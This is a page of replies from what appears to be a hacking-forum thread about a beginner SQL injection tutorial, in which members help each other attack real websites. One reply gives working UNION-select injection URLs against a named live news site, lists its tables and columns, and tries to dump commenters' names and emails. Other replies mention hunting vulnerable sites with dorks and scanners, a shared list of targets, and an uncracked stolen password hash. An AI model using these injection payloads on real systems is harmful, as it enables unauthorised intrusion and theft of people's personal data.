Sinisterly
SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed :D - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials)
+--- Thread: SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed :D (/Thread-SQL-Injection-Tutorial-100-NOOB-FRIENDLY-No-Previous-Hacking-Knowledge-Needed-D)

Pages: 1 2 3 4 5 6 7


RE: SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed :D - -HeX- - 06-28-2011

ty man...im really new at this stuff..only know few thinks...more tuts like this! ! Smile

edit:i tried a lot of this Dorks i even use Exploit Scaner and i can't find any vulnerable web site....pls help me


RE: SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed :D - changeusername123 - 07-03-2011

Nice short Tut saves time ^_^.


RE: SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed :D - Reverence - 07-03-2011

(07-03-2011, 12:20 AM)∑√ıŁ Wrote: Nice short Tut saves time ^_^.

Thanks! Glad you like it.


RE: SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed :D - rival - 07-09-2011

(06-30-2011, 07:34 PM)xxl00pb4ckxx Wrote: Hey I'm getting the hang of it, but no luck yet...

When I get to replacing @@version with concat(database()) to pull the db name I get this error on every site:

Here's an example:

http://www.blablaxx.com/opinions.php?ID=-2718%20union%20select%201,@@version,3,4,5,6,7,8,9,10,11,12--

works fine, outputs: 5.1.56

ok so I replace @@version and now the url looks like:

http://www.zigzagweeklynews.com/opinions.php?ID=-2718 union select 1,concat(database()),3,4,5,6,7,8,9,10,11,12--

the url look mangled in the input box: http://www.zigzagweeklynews.com/opinions.php?ID=-2718%20union%20select%201%2Cconcat%20database%20%20%20%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12-#1343470638987275374 now

and I get this error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database ,3,4,5,6,7,8,9,10,11,12- AND PostType = 2 LIMIT 13' at line 1

help? getting the same thing on like 5 vuln sites in a row Sad

this is my style bro....
http://www.zigzagweeklynews.com/opinions.php?ID=-2718 union select 1,concat(database()),3,4,5,6,7,8,9,10,11,12--


http://www.zigzagweeklynews.com/opinions.php?ID=-2718%20union%20select%201,group_concat(table_name),3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_schema=database()--

FOUnd:FORUM,FORUM_COMMENTS,OBITUARIES,POST

http://www.zigzagweeklynews.com/opinions.php?ID=-2718%20union%20select%201,group_concat(column_name),3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_schema=database()--

Found:ID,Title,Date,Post,VISIBLE,ID,Forum_ID,Name,Email,Location,Comment,Date,Visible,ID,Title,obituary,Image,IsVisible,ID,Title,Tagline,Author,DatePosted,Post,Image,Caption,ImageAuthor,PostType,FrontPage,IsPublish

it can't find admin table... so i just want to show you example to find user+pass from admin table..
this:
http://www.zigzagweeklynews.com/opinions.php?ID=-2718%20union%20select%201,group_concat(Name,0x3a,Email),3,4,5,6,7,8,9,10,11,12+from+zigzagwe_zigzag.FORUM_COMMENTS--

but it still not found another data ,because the table/column in database is none...

i'm so sorry before my english is sucks ...
^_^' :epic:




RE: SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed :D - sec0verun - 08-02-2011

man that shit was great but i am wondering why no one has any tuts about grabbing all data i want to make one can you collaborate with me and well post it together good fucking work id like to have a discussion with you you seem smart and i could use some new understanding un this fucking mysql4 with no schema lol


RE: SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed :D - Reverence - 08-03-2011

(08-02-2011, 11:27 PM)sec0verun Wrote: man that shit was great but i am wondering why no one has any tuts about grabbing all data i want to make one can you collaborate with me and well post it together good fucking work id like to have a discussion with you you seem smart and i could use some new understanding un this fucking mysql4 with no schema lol

Hacking websites with mysql 4 or lower is hard as fuck and takes forever even with tools. I don't recommend doing it.

And if you're looking for fresh sites to practice on, look at my list of vulnerable sites. Just follow the tutorial, some sites might not work btw.


RE: SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed :D - Hbkripcrick - 08-04-2011

I love hackng.But i dont have computer to do this


RE: SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed :D - Reverence - 08-06-2011

(08-06-2011, 02:15 PM)HackThenNom Wrote: I must be a mega noob, you lsot me when we were adding stuff to the end of the URL. the site i want to hack is


www.snsradio.co.uk

It isn't vulnerable to SQLi. You can't inject into it.


RE: SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed :D - The Ion - 08-07-2011

well your tutorial was very good and i kinda got it full but then i came up with this hash i cant decyrpt it haviji failed it too


3ad123c36286fddbf0a080a26c556741,6


RE: SQL Injection Tutorial! 100% NOOB FRIENDLY!! No Previous Hacking Knowledge Needed :D - kamikaze_kid - 08-19-2011

nice tut bro. . . easy to understand too...